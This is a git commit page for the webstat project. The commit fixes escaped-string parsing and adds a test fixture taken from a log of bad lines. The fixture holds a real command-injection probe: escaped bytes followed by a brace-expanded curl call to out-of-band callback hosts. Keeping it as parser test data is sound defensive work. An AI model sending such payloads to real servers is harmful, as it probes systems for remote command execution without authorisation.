diff options
| author | Dan Goodliffe <dan.goodliffe@octal.co.uk> | 2026-07-02 15:46:25 +0100 |
|---|---|---|
| committer | Dan Goodliffe <dan.goodliffe@octal.co.uk> | 2026-07-02 15:46:25 +0100 |
| commit | fbb5038105e26e07d34184544ea4c70892acef92 (patch) | |
| tree | 1bd79bc9280b65116dd714f202718e9a5e8d091b /test/fixtures/badHex.in.txt | |
| parent | 3cc7a1b1c0bf84ffcb149741c9ca2c60d9f00068 (diff) | |
| download | webstat-fbb5038105e26e07d34184544ea4c70892acef92.tar.bz2 webstat-fbb5038105e26e07d34184544ea4c70892acef92.tar.xz webstat-fbb5038105e26e07d34184544ea4c70892acef92.zip | |
Fixes to parseEscapedString
Fix the warnings picked up by the latest clang-tidy.
Add test cases lifted from the bad_lines log.
Add missing support for \b in escaping.
Diffstat (limited to 'test/fixtures/badHex.in.txt')
| -rw-r--r-- | test/fixtures/badHex.in.txt | 1 |
1 files changed, 1 insertions, 0 deletions
diff --git a/test/fixtures/badHex.in.txt b/test/fixtures/badHex.in.txt new file mode 100644 index 0000000..57fecba --- /dev/null +++ b/test/fixtures/badHex.in.txt @@ -0,0 +1 @@ +"/\x04\xd7\x7f\xbf\x18\xd8\x7f\xbf\x18\xd8\x7f\xbfd\xb8\x06\b;{curl,http:/d68kln4h7ttk42oulg6gs1q8cp6k5obp1.oast.site+-H+'User-Agent:+eUCxcw'};\x04\xd7\x7f\xbf\x18\xd8\x7f\xbf\x18\xd8\x7f\xbfd\xb8\x06\b;{curl,http:/d68kln4h7ttk42oulg6gwee1i13nkzmsm.oast.site+-H+'User-Agent:+eUCxcw'};" |
